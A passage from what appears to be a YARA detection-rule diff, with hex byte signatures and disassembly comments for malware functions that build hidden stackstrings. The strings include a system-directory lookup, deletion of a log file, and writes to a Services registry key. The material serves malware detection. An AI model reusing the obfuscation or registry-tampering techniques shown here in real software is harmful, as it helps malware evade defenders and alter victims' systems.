79 C6 84 24 ?? ?? ?? ?? 73 88 84 24 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 6D C6 84 24 ?? ?? ?? ?? 6F C6 84 24 ?? ?? ?? ?? 62 C6 84 24 ?? ?? ?? ?? 6A 88 9C 24 ?? ?? ?? ?? 88 8C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 22 C6 84 24 ?? ?? ?? ?? 29 C6 84 24 ?? ?? ?? ?? 2E C6 84 24 ?? ?? ?? ?? 64 8B 35 ?? ?? ?? ?? 6A 00 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 6C 88 9C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 66 C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 6C 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 20 C6 84 24 ?? ?? ?? ?? 77 C6 84 24 ?? ?? ?? ?? 73 88 8C 24 ?? ?? ?? ?? 88 94 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 70 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 2E C6 84 24 ?? ?? ?? ?? 73 88 8C 24 ?? ?? ?? ?? 88 94 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 70 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 66 C6 84 24 ?? ?? ?? ?? 75 C6 84 24 ?? ?? ?? ?? 6C C6 84 24 ?? ?? ?? ?? 6C C6 84 24 ?? ?? ?? ?? 6E C6 84 24 ?? ?? ?? ?? 61 C6 84 24 ?? ?? ?? ?? 6D 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 00 FF D6 6A 00 FF D6 8D 84 24 ?? ?? ?? ?? 68 04 01 00 00 50 6A 00 FF 15 ?? ?? ?? ?? B1 0A B0 0D 6A 00 C6 44 24 ?? 25 C6 44 24 ?? 73 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 25 C6 44 24 ?? 73 88 4C 24 ?? 88 44 24 ?? C6 84 24 ?? ?? ?? ?? 25 C6 84 24 ?? ?? ?? ?? 73 88 8C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 25 C6 84 24 ?? ?? ?? ?? 73 88 8C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 25 C6 84 24 ?? ?? ?? ?? 73 88 8C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 25 C6 84 24 ?? ?? ?? ?? 73 C6 84 24 ?? ?? ?? ?? 25 C6 84 24 ?? ?? ?? ?? 73 C6 84 24 ?? ?? ?? ?? 25 C6 84 24 ?? ?? ?? ?? 73 88 8C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 25 C6 84 24 ?? ?? ?? ?? 73 C6 84 24 ?? ?? ?? ?? 00 FF D6 8D 8C 24 ?? ?? ?? ?? 8D 54 24 ?? 51 8D 84 24 ?? ?? ?? ?? 52 8D 4C 24 ?? 50 8D 54 24 ?? 51 8D 84 24 ?? ?? ?? ?? 52 8D 8C 24 ?? ?? ?? ?? 50 8D 54 24 ?? 
51 8D 44 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 50 8D 94 24 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 2C 6A 00 FF D6 68 10 27 00 00 E8 ?? ?? ?? ?? 83 C4 04 8B F8 C6 84 24 ?? ?? ?? ?? 00 C6 44 24 ?? 25 6A 00 C6 44 24 ?? 73 C6 44 24 ?? 25 C6 44 24 ?? 64 C6 44 24 ?? 2E C6 44 24 ?? 76 C6 44 24 ?? 62 C6 44 24 ?? 73 C6 44 24 ?? 00 FF D6 8D 84 24 ?? ?? ?? ?? 57 8D 4C 24 ?? 50 8D 94 24 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 10 6A 00 FF D6 6A 00 6A 00 6A 02 6A 00 6A 00 8D 84 24 ?? ?? ?? ?? 68 00 00 00 40 50 FF 15 ?? ?? ?? ?? 6A 00 8B F8 FF D6 8D 8C 24 ?? ?? ?? ?? 6A 00 51 8D 94 24 ?? ?? ?? ?? 68 F4 01 00 00 52 57 FF 15 ?? ?? ?? ?? 6A 00 FF D6 57 FF 15 ?? ?? ?? ?? 6A 00 FF D6 6A 00 FF D6 C6 44 24 ?? 6F C6 44 24 ?? 70 88 5C 24 ?? 6A 00 C6 44 24 ?? 6E C6 44 24 ?? 00 FF D6 6A 00 6A 00 8D 84 24 ?? ?? ?? ?? 6A 00 8D 4C 24 ?? 50 51 6A 00 FF 15 ?? ?? ?? ?? 6A 00 FF D6 6A 00 FF D6 6A 00 FF 15 ?? ?? ?? ?? 5F 5E 5B 90 90 90 90 90 90 90 90 90 81 EC 34 01 00 00 B0 45 53 56 8B 35 ?? ?? ?? ?? 88 44 24 ?? 88 44 24 ?? 57 B0 65 B3 74 B1 79 6A 00 C6 44 24 ?? 4B C6 44 24 ?? 52 C6 44 24 ?? 4E C6 44 24 ?? 4C C6 44 24 ?? 33 C6 44 24 ?? 32 C6 44 24 ?? 2E C6 44 24 ?? 64 C6 44 24 ?? 6C C6 44 24 ?? 6C C6 44 24 ?? 00 C6 44 24 ?? 47 88 44 24 ?? 88 5C 24 ?? C6 44 24 ?? 53 88 4C 24 ?? C6 44 24 ?? 73 88 5C 24 ?? 88 44 24 ?? C6 44 24 ?? 6D C6 44 24 ?? 44 C6 44 24 ?? 69 C6 44 24 ?? 72 88 44 24 ?? C6 44 24 ?? 63 88 5C 24 ?? C6 44 24 ?? 6F C6 44 24 ?? 72 88 4C 24 ?? C6 44 24 ?? 41 C6 44 24 ?? 00 FF D6 8D 44 24 ?? 8D 4C 24 ?? 50 51 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A 00 8B F8 FF D6 8D 54 24 ?? 68 04 01 00 00 52 FF D7 6A 00 FF D6 6A 00 FF D6 6A 00 C6 44 24 ?? 5C C6 44 24 ?? 6F C6 44 24 ?? 75 C6 44 24 ?? 72 C6 44 24 ?? 6C C6 44 24 ?? 6F C6 44 24 ?? 67 C6 44 24 ?? 2E C6 44 24 ?? 64 C6 44 24 ?? 61 88 5C 24 ?? C6 44 24 ?? 00 FF D6 8D 44 24 ?? 8D 4C 24 ?? 50 51 FF 15 ?? ?? ?? ?? 6A 00 FF D6 6A 00 FF D6 8D 54 24 ?? 52 FF 15 ?? ?? ?? ?? 6A 00 FF D6 E8 ?? ?? ?? ?? 
5F 5E 5B 81 C4 34 01 00 00 C3 } + /* +Basic Block at 0x00406270@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x00406270 + .text:0x00406270 FUNC: int cdecl sub_00406270( ) [2 XREFS] + .text:0x00406270 + .text:0x00406270 Stack Variables: (offset from initial top of stack) + .text:0x00406270 -260: int local260 + .text:0x00406270 -261: int local261 + .text:0x00406270 -262: int local262 + .text:0x00406270 -263: int local263 + .text:0x00406270 -264: int local264 + .text:0x00406270 -265: int local265 + .text:0x00406270 -266: int local266 + .text:0x00406270 -267: int local267 + .text:0x00406270 -268: int local268 + .text:0x00406270 -269: int local269 + .text:0x00406270 -270: int local270 + .text:0x00406270 -271: int local271 + .text:0x00406270 -272: int local272 + .text:0x00406270 -273: int local273 + .text:0x00406270 -274: int local274 + .text:0x00406270 -275: int local275 + .text:0x00406270 -276: int local276 + .text:0x00406270 -277: int local277 + .text:0x00406270 -278: int local278 + .text:0x00406270 -279: int local279 + .text:0x00406270 -280: int local280 + .text:0x00406270 -284: int local284 + .text:0x00406270 -285: int local285 + .text:0x00406270 -286: int local286 + .text:0x00406270 -287: int local287 + .text:0x00406270 -288: int local288 + .text:0x00406270 -289: int local289 + .text:0x00406270 -290: int local290 + .text:0x00406270 -291: int local291 + .text:0x00406270 -292: int local292 + .text:0x00406270 -293: int local293 + .text:0x00406270 -294: int local294 + .text:0x00406270 -295: int local295 + .text:0x00406270 -296: int local296 + .text:0x00406270 -297: int local297 + .text:0x00406270 -298: int local298 + .text:0x00406270 -299: int local299 + .text:0x00406270 -300: int local300 + .text:0x00406270 -301: int local301 + .text:0x00406270 -302: int local302 + .text:0x00406270 -303: int local303 + .text:0x00406270 -304: int local304 + .text:0x00406270 -305: int local305 + .text:0x00406270 -306: int local306 + 
.text:0x00406270 -307: int local307 + .text:0x00406270 -308: int local308 + .text:0x00406270 + .text:0x00406270 81ec34010000 sub esp,308 + .text:0x00406276 b045 mov al,69 + .text:0x00406278 53 push ebx + .text:0x00406279 56 push esi + .text:0x0040627a 8b3578904000 mov esi,dword [0x00409078] + .text:0x00406280 88442415 mov byte [esp + 21],al + .text:0x00406284 88442418 mov byte [esp + 24],al + .text:0x00406288 57 push edi + .text:0x00406289 b065 mov al,101 + .text:0x0040628b b374 mov bl,116 + .text:0x0040628d b179 mov cl,121 + .text:0x0040628f 6a00 push 0 + .text:0x00406291 c644241c4b mov byte [esp + 28],75 + .text:0x00406296 c644241e52 mov byte [esp + 30],82 + .text:0x0040629b c644241f4e mov byte [esp + 31],78 + .text:0x004062a0 c64424214c mov byte [esp + 33],76 + .text:0x004062a5 c644242233 mov byte [esp + 34],51 + .text:0x004062aa c644242332 mov byte [esp + 35],50 + .text:0x004062af c64424242e mov byte [esp + 36],46 + .text:0x004062b4 c644242564 mov byte [esp + 37],100 + .text:0x004062b9 c64424266c mov byte [esp + 38],108 + .text:0x004062be c64424276c mov byte [esp + 39],108 + .text:0x004062c3 c644242800 mov byte [esp + 40],0 + .text:0x004062c8 c644242c47 mov byte [esp + 44],71 + .text:0x004062cd 8844242d mov byte [esp + 45],al + .text:0x004062d1 885c242e mov byte [esp + 46],bl + .text:0x004062d5 c644242f53 mov byte [esp + 47],83 + .text:0x004062da 884c2430 mov byte [esp + 48],cl + .text:0x004062de c644243173 mov byte [esp + 49],115 + .text:0x004062e3 885c2432 mov byte [esp + 50],bl + .text:0x004062e7 88442433 mov byte [esp + 51],al + .text:0x004062eb c64424346d mov byte [esp + 52],109 + .text:0x004062f0 c644243544 mov byte [esp + 53],68 + .text:0x004062f5 c644243669 mov byte [esp + 54],105 + .text:0x004062fa c644243772 mov byte [esp + 55],114 + .text:0x004062ff 88442438 mov byte [esp + 56],al + .text:0x00406303 c644243963 mov byte [esp + 57],99 + .text:0x00406308 885c243a mov byte [esp + 58],bl + .text:0x0040630c c644243b6f mov byte [esp + 59],111 + 
.text:0x00406311 c644243c72 mov byte [esp + 60],114 + .text:0x00406316 884c243d mov byte [esp + 61],cl + .text:0x0040631a c644243e41 mov byte [esp + 62],65 + .text:0x0040631f c644243f00 mov byte [esp + 63],0 + .text:0x00406324 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406326 8d442428 lea eax,dword [esp + 40] + .text:0x0040632a 8d4c2418 lea ecx,dword [esp + 24] + .text:0x0040632e 50 push eax + .text:0x0040632f 51 push ecx + .text:0x00406330 ff15ec904000 call dword [0x004090ec] ;kernel32.LoadLibraryA(local1472) + .text:0x00406336 50 push eax + .text:0x00406337 ff15e8904000 call dword [0x004090e8] ;kernel32.GetProcAddress(kernel32,local1456) + .text:0x0040633d 6a00 push 0 + .text:0x0040633f 8bf8 mov edi,eax + .text:0x00406341 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406343 8d54243c lea edx,dword [esp + 60] + .text:0x00406347 6804010000 push 260 + .text:0x0040634c 52 push edx + .text:0x0040634d ffd7 call edi ;kernel32.GetSystemDirectoryA(local1436,260) + .text:0x0040634f 6a00 push 0 + .text:0x00406351 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406353 6a00 push 0 + .text:0x00406355 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406357 6a00 push 0 + .text:0x00406359 c64424105c mov byte [esp + 16],92 + .text:0x0040635e c64424116f mov byte [esp + 17],111 + .text:0x00406363 c644241275 mov byte [esp + 18],117 + .text:0x00406368 c644241372 mov byte [esp + 19],114 + .text:0x0040636d c64424146c mov byte [esp + 20],108 + .text:0x00406372 c64424156f mov byte [esp + 21],111 + .text:0x00406377 c644241667 mov byte [esp + 22],103 + .text:0x0040637c c64424172e mov byte [esp + 23],46 + .text:0x00406381 c644241864 mov byte [esp + 24],100 + .text:0x00406386 c644241961 mov byte [esp + 25],97 + .text:0x0040638b 885c241a mov byte [esp + 26],bl + .text:0x0040638f c644241b00 mov byte [esp + 27],0 + .text:0x00406394 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406396 8d44240c lea eax,dword [esp + 12] + .text:0x0040639a 8d4c243c lea ecx,dword [esp + 60] + .text:0x0040639e 50 push eax + 
.text:0x0040639f 51 push ecx + .text:0x004063a0 ff15cc904000 call dword [0x004090cc] ;kernel32.lstrcatA(local1436,local1484) + .text:0x004063a6 6a00 push 0 + .text:0x004063a8 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004063aa 6a00 push 0 + .text:0x004063ac ffd6 call esi ;kernel32.Sleep(0) + .text:0x004063ae 8d54243c lea edx,dword [esp + 60] + .text:0x004063b2 52 push edx + .text:0x004063b3 ff1518914000 call dword [0x00409118] ;kernel32.DeleteFileA(local1436) + .text:0x004063b9 6a00 push 0 + .text:0x004063bb ffd6 call esi ;kernel32.Sleep(0) + .text:0x004063bd e85ef5ffff call 0x00405920 ;sub_00405920() + .text:0x004063c2 5f pop edi + .text:0x004063c3 5e pop esi + .text:0x004063c4 5b pop ebx + .text:0x004063c5 81c434010000 add esp,308 + .text:0x004063cb c3 ret + */ + $c7 = { 81 EC 34 01 00 00 B0 45 53 56 8B 35 ?? ?? ?? ?? 88 44 24 ?? 88 44 24 ?? 57 B0 65 B3 74 B1 79 6A 00 C6 44 24 ?? 4B C6 44 24 ?? 52 C6 44 24 ?? 4E C6 44 24 ?? 4C C6 44 24 ?? 33 C6 44 24 ?? 32 C6 44 24 ?? 2E C6 44 24 ?? 64 C6 44 24 ?? 6C C6 44 24 ?? 6C C6 44 24 ?? 00 C6 44 24 ?? 47 88 44 24 ?? 88 5C 24 ?? C6 44 24 ?? 53 88 4C 24 ?? C6 44 24 ?? 73 88 5C 24 ?? 88 44 24 ?? C6 44 24 ?? 6D C6 44 24 ?? 44 C6 44 24 ?? 69 C6 44 24 ?? 72 88 44 24 ?? C6 44 24 ?? 63 88 5C 24 ?? C6 44 24 ?? 6F C6 44 24 ?? 72 88 4C 24 ?? C6 44 24 ?? 41 C6 44 24 ?? 00 FF D6 8D 44 24 ?? 8D 4C 24 ?? 50 51 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A 00 8B F8 FF D6 8D 54 24 ?? 68 04 01 00 00 52 FF D7 6A 00 FF D6 6A 00 FF D6 6A 00 C6 44 24 ?? 5C C6 44 24 ?? 6F C6 44 24 ?? 75 C6 44 24 ?? 72 C6 44 24 ?? 6C C6 44 24 ?? 6F C6 44 24 ?? 67 C6 44 24 ?? 2E C6 44 24 ?? 64 C6 44 24 ?? 61 88 5C 24 ?? C6 44 24 ?? 00 FF D6 8D 44 24 ?? 8D 4C 24 ?? 50 51 FF 15 ?? ?? ?? ?? 6A 00 FF D6 6A 00 FF D6 8D 54 24 ?? 52 FF 15 ?? ?? ?? ?? 6A 00 FF D6 E8 ?? ?? ?? ?? 
5F 5E 5B 81 C4 34 01 00 00 C3 } + /* +Basic Block at 0x00406650@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x00406650 + .text:0x00406650 FUNC: int cdecl sub_00406650( int arg0, ) [4 XREFS] + .text:0x00406650 + .text:0x00406650 Stack Variables: (offset from initial top of stack) + .text:0x00406650 4: int arg0 + .text:0x00406650 -1023: int local1023 + .text:0x00406650 -1024: int local1024 + .text:0x00406650 -1283: int local1283 + .text:0x00406650 -1284: int local1284 + .text:0x00406650 -1290: int local1290 + .text:0x00406650 -1292: int local1292 + .text:0x00406650 -1294: int local1294 + .text:0x00406650 -1298: int local1298 + .text:0x00406650 -1300: int local1300 + .text:0x00406650 -1304: int local1304 + .text:0x00406650 -1305: int local1305 + .text:0x00406650 -1306: int local1306 + .text:0x00406650 -1307: int local1307 + .text:0x00406650 -1308: int local1308 + .text:0x00406650 -1309: int local1309 + .text:0x00406650 -1310: int local1310 + .text:0x00406650 -1311: int local1311 + .text:0x00406650 -1312: int local1312 + .text:0x00406650 -1313: int local1313 + .text:0x00406650 -1314: int local1314 + .text:0x00406650 -1315: int local1315 + .text:0x00406650 -1316: int local1316 + .text:0x00406650 -1317: int local1317 + .text:0x00406650 -1318: int local1318 + .text:0x00406650 -1319: int local1319 + .text:0x00406650 -1320: int local1320 + .text:0x00406650 -1321: int local1321 + .text:0x00406650 -1322: int local1322 + .text:0x00406650 -1323: int local1323 + .text:0x00406650 -1324: int local1324 + .text:0x00406650 -1325: int local1325 + .text:0x00406650 -1326: int local1326 + .text:0x00406650 -1327: int local1327 + .text:0x00406650 -1328: int local1328 + .text:0x00406650 -1329: int local1329 + .text:0x00406650 -1330: int local1330 + .text:0x00406650 -1331: int local1331 + .text:0x00406650 -1332: int local1332 + .text:0x00406650 -1333: int local1333 + .text:0x00406650 -1334: int local1334 + .text:0x00406650 -1335: int 
local1335 + .text:0x00406650 -1336: int local1336 + .text:0x00406650 -1337: int local1337 + .text:0x00406650 -1338: int local1338 + .text:0x00406650 -1339: int local1339 + .text:0x00406650 -1340: int local1340 + .text:0x00406650 -1341: int local1341 + .text:0x00406650 -1342: int local1342 + .text:0x00406650 -1343: int local1343 + .text:0x00406650 -1344: int local1344 + .text:0x00406650 -1345: int local1345 + .text:0x00406650 -1346: int local1346 + .text:0x00406650 -1347: int local1347 + .text:0x00406650 -1348: int local1348 + .text:0x00406650 -1349: int local1349 + .text:0x00406650 -1350: int local1350 + .text:0x00406650 -1351: int local1351 + .text:0x00406650 -1352: int local1352 + .text:0x00406650 -1353: int local1353 + .text:0x00406650 -1354: int local1354 + .text:0x00406650 -1355: int local1355 + .text:0x00406650 -1356: int local1356 + .text:0x00406650 -1357: int local1357 + .text:0x00406650 -1358: int local1358 + .text:0x00406650 -1359: int local1359 + .text:0x00406650 -1360: int local1360 + .text:0x00406650 -1361: int local1361 + .text:0x00406650 -1362: int local1362 + .text:0x00406650 -1363: int local1363 + .text:0x00406650 -1364: int local1364 + .text:0x00406650 -1368: int local1368 + .text:0x00406650 -1369: int local1369 + .text:0x00406650 -1370: int local1370 + .text:0x00406650 -1371: int local1371 + .text:0x00406650 -1372: int local1372 + .text:0x00406650 -1373: int local1373 + .text:0x00406650 -1374: int local1374 + .text:0x00406650 -1375: int local1375 + .text:0x00406650 -1376: int local1376 + .text:0x00406650 + .text:0x00406650 81ec60050000 sub esp,1376 + .text:0x00406656 53 push ebx + .text:0x00406657 55 push ebp + .text:0x00406658 56 push esi + .text:0x00406659 57 push edi + .text:0x0040665a b9ff000000 mov ecx,255 + .text:0x0040665f 33c0 xor eax,eax + .text:0x00406661 8dbc2471010000 lea edi,dword [esp + 369] + .text:0x00406668 c684247001000000 mov byte [esp + 368],0 + .text:0x00406670 f3ab rep: stosd + .text:0x00406672 8b3578904000 mov esi,dword 
[0x00409078] + .text:0x00406678 6a00 push 0 + .text:0x0040667a 66ab stosd + .text:0x0040667c aa stosb + .text:0x0040667d ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040667f b343 mov bl,67 + .text:0x00406681 b053 mov al,83 + .text:0x00406683 885c243b mov byte [esp + 59],bl + .text:0x00406687 885c2442 mov byte [esp + 66],bl + .text:0x0040668b b36f mov bl,111 + .text:0x0040668d 88442434 mov byte [esp + 52],al + .text:0x00406691 88442436 mov byte [esp + 54],al + .text:0x00406695 885c2443 mov byte [esp + 67],bl + .text:0x00406699 885c2447 mov byte [esp + 71],bl + .text:0x0040669d 88442449 mov byte [esp + 73],al + .text:0x004066a1 8844244d mov byte [esp + 77],al + .text:0x004066a5 b25c mov dl,92 + .text:0x004066a7 b174 mov cl,116 + .text:0x004066a9 b073 mov al,115 + .text:0x004066ab b325 mov bl,37 + .text:0x004066ad 6a00 push 0 + .text:0x004066af c644243959 mov byte [esp + 57],89 + .text:0x004066b4 c644243b54 mov byte [esp + 59],84 + .text:0x004066b9 c644243c45 mov byte [esp + 60],69 + .text:0x004066be c644243d4d mov byte [esp + 61],77 + .text:0x004066c3 8854243e mov byte [esp + 62],dl + .text:0x004066c7 c644244075 mov byte [esp + 64],117 + .text:0x004066cc c644244172 mov byte [esp + 65],114 + .text:0x004066d1 c644244272 mov byte [esp + 66],114 + .text:0x004066d6 c644244365 mov byte [esp + 67],101 + .text:0x004066db c64424446e mov byte [esp + 68],110 + .text:0x004066e0 884c2445 mov byte [esp + 69],cl + .text:0x004066e4 c64424486e mov byte [esp + 72],110 + .text:0x004066e9 884c2449 mov byte [esp + 73],cl + .text:0x004066ed c644244a72 mov byte [esp + 74],114 + .text:0x004066f2 c644244c6c mov byte [esp + 76],108 + .text:0x004066f7 c644244e65 mov byte [esp + 78],101 + .text:0x004066fc 884c244f mov byte [esp + 79],cl + .text:0x00406700 88542450 mov byte [esp + 80],dl + .text:0x00406704 c644245265 mov byte [esp + 82],101 + .text:0x00406709 c644245372 mov byte [esp + 83],114 + .text:0x0040670e c644245476 mov byte [esp + 84],118 + .text:0x00406713 c644245569 mov byte [esp + 
85],105 + .text:0x00406718 c644245663 mov byte [esp + 86],99 + .text:0x0040671d c644245765 mov byte [esp + 87],101 + .text:0x00406722 88442458 mov byte [esp + 88],al + .text:0x00406726 88542459 mov byte [esp + 89],dl + .text:0x0040672a 885c245a mov byte [esp + 90],bl + .text:0x0040672e 8844245b mov byte [esp + 91],al + .text:0x00406732 c644245c00 mov byte [esp + 92],0 + .text:0x00406737 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406739 8b842474050000 mov eax,dword [esp + 1396] + .text:0x00406740 8b2dd8914000 mov ebp,dword [0x004091d8] + .text:0x00406746 8d4c2434 lea ecx,dword [esp + 52] + .text:0x0040674a 50 push eax + .text:0x0040674b 8d942474010000 lea edx,dword [esp + 372] + .text:0x00406752 51 push ecx + .text:0x00406753 52 push edx + .text:0x00406754 ffd5 call ebp ;user32.wsprintfA(local1024,local1340) + .text:0x00406756 83c40c add esp,12 + .text:0x00406759 6a00 push 0 + .text:0x0040675b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040675d 6a00 push 0 + .text:0x0040675f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406761 8d44245c lea eax,dword [esp + 92] + .text:0x00406765 50 push eax + .text:0x00406766 ff1528914000 call dword [0x00409128] ;kernel32.GetLocalTime(local1300) + .text:0x0040676c b940000000 mov ecx,64 + .text:0x00406771 33c0 xor eax,eax + .text:0x00406773 8d7c246d lea edi,dword [esp + 109] + .text:0x00406777 c644246c00 mov byte [esp + 108],0 + .text:0x0040677c f3ab rep: stosd + .text:0x0040677e 66ab stosd + .text:0x00406780 aa stosb + .text:0x00406781 b064 mov al,100 + .text:0x00406783 b22e mov dl,46 + .text:0x00406785 b132 mov cl,50 + .text:0x00406787 6a00 push 0 + .text:0x00406789 885c2420 mov byte [esp + 32],bl + .text:0x0040678d c644242134 mov byte [esp + 33],52 + .text:0x00406792 88442422 mov byte [esp + 34],al + .text:0x00406796 c64424232d mov byte [esp + 35],45 + .text:0x0040679b 885c2424 mov byte [esp + 36],bl + .text:0x0040679f 88542425 mov byte [esp + 37],dl + .text:0x004067a3 884c2426 mov byte [esp + 38],cl + .text:0x004067a7 88442427 
mov byte [esp + 39],al + .text:0x004067ab c64424282d mov byte [esp + 40],45 + .text:0x004067b0 885c2429 mov byte [esp + 41],bl + .text:0x004067b4 8854242a mov byte [esp + 42],dl + .text:0x004067b8 884c242b mov byte [esp + 43],cl + .text:0x004067bc 8844242c mov byte [esp + 44],al + .text:0x004067c0 c644242d20 mov byte [esp + 45],32 + .text:0x004067c5 885c242e mov byte [esp + 46],bl + .text:0x004067c9 8854242f mov byte [esp + 47],dl + .text:0x004067cd 884c2430 mov byte [esp + 48],cl + .text:0x004067d1 88442431 mov byte [esp + 49],al + .text:0x004067d5 c64424323a mov byte [esp + 50],58 + .text:0x004067da 885c2433 mov byte [esp + 51],bl + .text:0x004067de 88542434 mov byte [esp + 52],dl + .text:0x004067e2 884c2435 mov byte [esp + 53],cl + .text:0x004067e6 88442436 mov byte [esp + 54],al + .text:0x004067ea c644243700 mov byte [esp + 55],0 + .text:0x004067ef ffd6 call esi ;kernel32.Sleep(0) + .text:0x004067f1 8b4c2466 mov ecx,dword [esp + 102] + .text:0x004067f5 8b542464 mov edx,dword [esp + 100] + .text:0x004067f9 8b442462 mov eax,dword [esp + 98] + .text:0x004067fd 81e1ffff0000 and ecx,0x0000ffff + .text:0x00406803 81e2ffff0000 and edx,0x0000ffff + .text:0x00406809 51 push ecx + .text:0x0040680a 8b4c2462 mov ecx,dword [esp + 98] + .text:0x0040680e 52 push edx + .text:0x0040680f 8b542464 mov edx,dword [esp + 100] + .text:0x00406813 25ffff0000 and eax,0x0000ffff + .text:0x00406818 81e1ffff0000 and ecx,0x0000ffff + .text:0x0040681e 50 push eax + .text:0x0040681f 81e2ffff0000 and edx,0x0000ffff + .text:0x00406825 51 push ecx + .text:0x00406826 8d44242c lea eax,dword [esp + 44] + .text:0x0040682a 52 push edx + .text:0x0040682b 8d8c2480000000 lea ecx,dword [esp + 128] + .text:0x00406832 50 push eax + .text:0x00406833 51 push ecx + .text:0x00406834 ffd5 call ebp ;user32.wsprintfA(local1284,local1364) + .text:0x00406836 83c41c add esp,28 + .text:0x00406839 6a00 push 0 + .text:0x0040683b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040683d 8d54246c lea edx,dword [esp + 108] + 
.text:0x00406841 6a00 push 0 + .text:0x00406843 52 push edx + .text:0x00406844 c64424184d mov byte [esp + 24],77 + .text:0x00406849 c644241961 mov byte [esp + 25],97 + .text:0x0040684e c644241a72 mov byte [esp + 26],114 + .text:0x00406853 c644241b6b mov byte [esp + 27],107 + .text:0x00406858 c644241c54 mov byte [esp + 28],84 + .text:0x0040685d c644241d69 mov byte [esp + 29],105 + .text:0x00406862 c644241e6d mov byte [esp + 30],109 + .text:0x00406867 c644241f65 mov byte [esp + 31],101 + .text:0x0040686c c644242000 mov byte [esp + 32],0 + .text:0x00406871 ff15c4904000 call dword [0x004090c4] ;kernel32.lstrlenA(local1284) + .text:0x00406877 50 push eax + .text:0x00406878 8d442474 lea eax,dword [esp + 116] + .text:0x0040687c 50 push eax + .text:0x0040687d 8d4c241c lea ecx,dword [esp + 28] + .text:0x00406881 6a01 push 1 + .text:0x00406883 8d942480010000 lea edx,dword [esp + 384] + .text:0x0040688a 51 push ecx + .text:0x0040688b 52 push edx + .text:0x0040688c 6802000080 push 0x80000002 + .text:0x00406891 e84ae3ffff call 0x00404be0 ;sub_00404be0(0x80000002,local1024,local1376,1,local1284,kernel32.lstrlenA(local1284),0) + .text:0x00406896 83c41c add esp,28 + .text:0x00406899 5f pop edi + .text:0x0040689a 5e pop esi + .text:0x0040689b 5d pop ebp + .text:0x0040689c 5b pop ebx + .text:0x0040689d 81c460050000 add esp,1376 + .text:0x004068a3 c3 ret + */ + $c8 = { 81 EC 60 05 00 00 53 55 56 57 B9 FF 00 00 00 33 C0 8D BC 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 00 F3 AB 8B 35 ?? ?? ?? ?? 6A 00 66 AB AA FF D6 B3 43 B0 53 88 5C 24 ?? 88 5C 24 ?? B3 6F 88 44 24 ?? 88 44 24 ?? 88 5C 24 ?? 88 5C 24 ?? 88 44 24 ?? 88 44 24 ?? B2 5C B1 74 B0 73 B3 25 6A 00 C6 44 24 ?? 59 C6 44 24 ?? 54 C6 44 24 ?? 45 C6 44 24 ?? 4D 88 54 24 ?? C6 44 24 ?? 75 C6 44 24 ?? 72 C6 44 24 ?? 72 C6 44 24 ?? 65 C6 44 24 ?? 6E 88 4C 24 ?? C6 44 24 ?? 6E 88 4C 24 ?? C6 44 24 ?? 72 C6 44 24 ?? 6C C6 44 24 ?? 65 88 4C 24 ?? 88 54 24 ?? C6 44 24 ?? 65 C6 44 24 ?? 72 C6 44 24 ?? 76 C6 44 24 ?? 69 C6 44 24 ?? 63 C6 44 24 ?? 
